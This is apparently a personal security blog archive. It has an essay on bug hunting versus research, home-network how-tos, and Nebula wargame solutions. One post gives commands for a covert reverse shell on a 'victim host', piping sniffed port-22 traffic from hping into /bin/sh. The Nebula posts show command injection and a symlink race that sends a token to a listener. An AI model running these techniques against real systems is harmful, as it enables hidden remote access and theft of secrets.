PH

Bug hunting is not a security research

2013-05-27T00:00:00+00:00

Unfortunately, "security research" is commonly used to stand out a basic bug hunting work from others. There is a page on the majority companies/personal websites titled as security research, however, What you can usually end up seeing there is a list of published security advisories or reported security vulnerabilities often with proof-of-concepts and exploit codes. Here I just wanted to have a few words to point out what is research and what is not.

What is not research:

Looking at different public resources on the definition of "research", I found the following work has a good explanation on the differences between what research is and is not. Sharkawi from University of Washington says:

it is not information gathering (e.g. google-ing is not act of research!)
It is no reascending of facts (e.g. not doing a good literature review and doing/writing something on a known subject is not a research. This happens quite often in info-sec field. Have a look at these works Hijacking airplanes with an Android phone and Hacker + Airplanes = No Good Can Come Of This for example. All talking about similar topics (ATC, ADS-B) with no proper referencing to the original work.)
It is not a sale pith (a new improvement in a product developed after years of research!)

What is research

Sharkawi continues on what the characteristics of a research work are:

Originated with a new questions, idea or a problem with no acceptable solution
Requires clear articulation of a goal
Follows a specific plan of procedure
Literature review and publication of findings in an acceptable form

Well I can't really see all/any of the above characteristics in what is called nowadays as security research. Lets be positive and try to find a way to describe the above characteristics in the current security research practices:

Finding or exploiting a software bug is neither a new question, a new idea, nor a problem with no acceptable solution. It is about finding problem in someone else's code or finding a human mistake that typically happens because of time and budget limitation on software development.
I don't really see a clear definition of a goal in any security advisories. Perhaps the goal is "To find coding mistakes in X though Y that result in Z!"
Specific plan? Can you see flow of scientific process method in any of the security advisories? What I mean by that? Have a look at [1] it has simply 6 stages for any scientific procedure: hypothesis, deduction, predictions, observation, test of predictions, induction.
Literature review! Tell me about it. There are so much plagiarism of both ideas and codes without any references what so ever!

Still insisting to call it a security research?

Then in this case we are going to have the following situation:

Software bugs are research problems!
Debuggers are virtual research labs.
Software developers are scientific professors as in their daily job they deals with lots of research problems and scientifically fixing them!
Patching software bugs is scientific research experiment.

Hope you get what I am going with this.

So, what to call it then?

Well I wanted to call it an engineering practice. But after do some reading articles like this I still do not see the steps involve in Engineering Design Practise in bug hunting:

Define the Problem (What, Who, Why)
Do Background Research
Specify Requirements
Create Alternative Solutions
Choose the Best Solution
Do Development Work
Build a Prototype
Test and Redesign

Overall the process involve in both engineering and scientific methods are more rigorous that finding software bugs. In a best case scenario, finding or exploiting security bugs (and not identifying coding mistakes!) is more of an engineering process. The process is to analyse and monitor a software operation via a not well defined method to discover a software bug or exploit a bug in different way.

That's for now!

References

[1] Wilson, E. Bright. An Introduction to Scientific Research. McGraw-Hill. 1952.
[2] M. A. Sharkawi. Research and Development. University of Washington. 2012.
[3] Hackers get Schooled: Learning Lessons from Academia. (Panel discussion). ShmooCon 2013.

Create hidden reverse shell by reusing an open port

2013-05-11T00:00:00+00:00

You want to create a reverse shell and your box seats behind a NAT, a proxy, or a firewall and you don't have enough access to modify the settings on those edge devises to allow an incoming port. I am assuming that at least you have one open and publicly routable port on your box e.g. SSH, HTTP, etc.
Good news is you can reuse that open port to create a reverse shell.

Create a reverse shell by reusing an open port

Lets assume you want to create a reverse shell from box A to box B. Box B is your host behind NAT and box A is your victim host.

Download and install hping:

On A run the following command:

hping -I eth0 -p 22 --listen PATTERN | /bin/sh

The above command puts hping in a listen/sniff mode on eth0 interface and port 22 that is an open and publicly routable port. It listens to specific PATTERN in the incoming data. This is important to distinguish between the data that you are interested to capture and other data that come to port 22. PATTERN is a signature payload that hping looks for inside that TCP data payload. You can use any keyword here like 'mySecret', '[root@victim root]'.

On B run the following command:

echo "PATTERN;" | ncat -v BOXA-IP 22

Remember to replace PATTERN to your signature e.g. 'mySecret'. Now you should have nice reverse shell.

How does this work?

hping intercepts the traffic coming to your selected port. Using pipe we send the incoming traffic to bash. Cool right? Now imagine what else you can do? Here is a tip. hping sniffs the traffic at the interface level (like tcpdump) so it means we can use it to listen to ANY incoming traffic on ANY port! I leave this as a challenge for your to find a way.

Reference

Fix boot loader on encrypted hard drive

2012-11-24T00:00:00+00:00

I had issue with lilo boot-loader on my encrypted debian setup, needed to re-install the boot loader, decided to go with grub as lilo was not reliable with encrypted (luks) drives. I found really good write-up on how to fix the boot loader (grub) with encryption here

the only thing I like to add is, if you dont manage to mount your /boot try to force the filesystem type:

mount -t ext2 /boot /mnt/myhdd/boot

botCloud - a command and control platform on the Cloud

2012-11-03T00:00:00+00:00

My recent write-up on a summary of the research experiment (botCloud) has got interesting international coverage. Here is quick responses to some of the comments:

"Computing is becoming cheaper and cheaper and for something like $10 one can buy enough computing power to take down a small website for a few hours," Costin Raiu, director of the Global Research & Analysis Team at antivirus vendor Kaspersky Lab, said Tuesday via email. "However, it's also important to say that 'traditional' methods of infecting users with trojans are probably even cheaper and much more resilient to takedowns." -- CIO

In the 'traditional' botnets, the setup cost - identifying victims, bypassing security systems and hoping for execution of malware on a user's box - is relatively higher. The cost of platform's reliability is another factor that can potentially increase the overall figure.

"It takes a lot of time to find a user which is infected by something like a bot from the Pandora DDoS family and convince him to clean his PC," Raiu said. "Such infections can last for weeks or for months - making them a lot cheaper than cloud computing solutions." -- Computer World

Lets talk about zero-days here. No mater it is a PC or a cloud instance it could be hard to detect such infection in both cases. Given the access level available for a malicious entity in the cloud compare with a zombie PC, they have better chance of hiding infections and using the platform for a longer period.

David Harley, a senior research fellow at antivirus vendor ESET, said Tuesday via email. "I can't comment on how typical these providers were. However, when and where cloud providers do implement such countermeasures, the overheads for developing a resilient malicious network are likely to increase sharply." -- Tech World

As this concept as well as Cloud computing itself is relatively new to the market, the challenge nowadays is to design such countermeasures. Developing and implementing a countermeasure framework that can well operate in such large-scale situation is still a hot research topic.

SSH keyboard for Android

2012-07-16T00:00:00+00:00

Problem

Some useful terminal keys are missing on the android stock keyboard. For example, CTRL, UP arrow, etc. Some apps like connectbot let user to enter these keys by combining other keys or using buttons on the device. The problem happens when phone doesn't come with such buttons like trackball (e.g. HTC Wildfire S) and there is no way to enter those keys.

SSH for AnySoftKeyboard

SSH for AnySoftKeyboard is a handy virtual keyboard that includes special keys for using with SSH clients, terminal emulators etc. You can see below apps' screenshot.

Features

Special keys: CTRL, arrows, tab
Command suggestion and auto completion based on user mostly used commands

Usage

This is a keyboard layout for AnySoftKeyboard app. You need to install AnySoftKeyboard first and then install SSH for AnySoftKeyboard. Enable SSH keyboard layout in the AnySoftKeyboard settings. If command suggestion does not work, tap and hold on Enter key and use SSH as default dictionary for this keyboard (this doesn't effect settings for your other keyboards). You can add your own commands as you use the application and they will show up next time you start typing them.

Download

Get this app from Google Play. The source code is also available in GitHub.

Notes

The command suggestion feature was tested only with VX Connectbot.

Setup NFS to smoothly share 1080p movies over Wireless

2012-05-28T00:00:00+00:00

NFS is the traditional lightweight and superfast file sharing solution on mainly Nix and BSD distros. Due to small protocol overhead, NFS is one of the fastest ways of sharing files over local networks (See NFS vs SMF vs FTP vs SSH speed benchmark). So if you want to share those 1080p movies over home network to your HTPC without any stuttering, NFS can be the best choice.

So how to setup FreeNAS7 with NFS share? The first thing is WebGUI for FreeNAS7 is buggy for NFS service. So, have your SSH connection to FreeNAS ready.

Step1: Enable NFS through WebGUI

Services > NFS > Shares > [+]
Path: path to your movie directory on the server
Map all users to root: if you want to give write access select yes
Authorised network: Subclass C of your network e.g. 192.168.1.1/24
Press Add.
Apply changes and wait for NFS service to start.

Step2: Modification through SSH

SSH to FreeNAS7
Change user to root (su)
Edit /etc/exports (e.g. vi /etc/exports)
If you have multiple directories on one mounting point that you want to share on the same network, make sure to add them all in one line. e.g. /mnt/disk1/music /mnt/disk1/video
Remove mask and network part and add the client IP address that you want to have access from. e.g. 192.168.1.2
Optional add -mapall=YOURUSERNAME to give write access to share directory.
You config file should look like: /mnt/disk1/music /mnt/disk1/video -mapall=pi3ch 192.168.1.2
Restart NFS service: kill -HUP `cat /var/run/mountd.pid`

Step3: Check and mount share directories

On the client host run

showmount -e FREENASIP

if you can see the share directories congrat! if not, have look at the logs (WebGUI > Diagnostics > Log)

To mount a NFS share on the client host run (as a root)

mount FREENASIP:FULLPATHTODIR MOUNTPOINT
e.g. mount 192.168.1.1:/mnt/disk1/music music

Enjoy the speed of NFS!

Access Mutt attachments remotely (SSH)

2012-05-14T00:00:00+00:00

Mutt is hard to adopt, once-you-learn-you-love-it, and very flexible email clients. Through remote (e.g. SSH) connections is time-consuming to open the attachments. It needs to save and download the attachment to remote host. One way to get around this is to serve the attachment through a webserver on a specific port and open up the browser on the remote host to view the attachment on that port. This can be easily done by a simple bash script and using netcat. Below is the script that you need to save in your home directory (e.g. ~/bin/muttattach.sh).

Make it executable (e.g. chmod +x muttattach.sh). Modify ~/.mutt/mailcap and the following lines:

text/; ~/bin/muttattch.sh %s
application/; ~/bin/muttattch.sh %s
image/; ~/bin/muttattch.sh %s
audio/; ~/bin/muttattch.sh %s

Now open up an attachment in mutt, browse to http://localhost:8083 on remote host.
the above script is the modified version of http://www.linuxjournal.com/article/6511

Nebula level 12 solution

2012-05-07T00:00:00+00:00

A simple command execution issue with the .lua code. Initially you need to connect to localhost on port 50001. Then simply inject the command as 'Password'. Line 5 inserts everything from "Password" prompt to the command string.

Solution

nc 127.0.0.1 50001
Password: |getflag >/tmp/flag
Better luck next time
less /tmp/flag
You have successfully executed getflag on a target account

Nebula level10 solution

2012-02-01T00:00:00+00:00

the access() check is done using the calling process's real UID and GID, rather than the effective IDs as is done when actually opening the file - open(). The idea here is to create a symbolic link to a readable file, once the program pass the following line, change the symbolic link to the /home/flag10/token file so the open() and read() operations fetch the content of the file.

if(access(argv[1], ROK) == 0) {

To do so, you need another host to listen to incomming connections on port 18211.

1. Execute flag10 in the background i.e. ./flag10 ~/pi3ch OTHERHOSTIPADDRESS &
2. rm ~/pi3ch; ln -s /home/flag10/token ~/pi3ch
3. On the other host listen to the connection on port 18211 e.g. nc -vvvv -n -l -p 18211
4. Wait and once you get 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 you are done with this level (content of token file).

An alternative solution for this problem is posted on http://www.mattandreko.com/2011/12/exploit-exercises-nebula-10.html

New ways to learn completely different from what you may think learning is about

2012-01-31T00:00:00+00:00

New ways to learn 1) learn in the chain and series not step-by-step 2) learn in different places 3) the more challenging retrieval is the better you learn (so never make a note during class, do after)
http://www.wired.com/geekdad/2012/01/everything-about-learning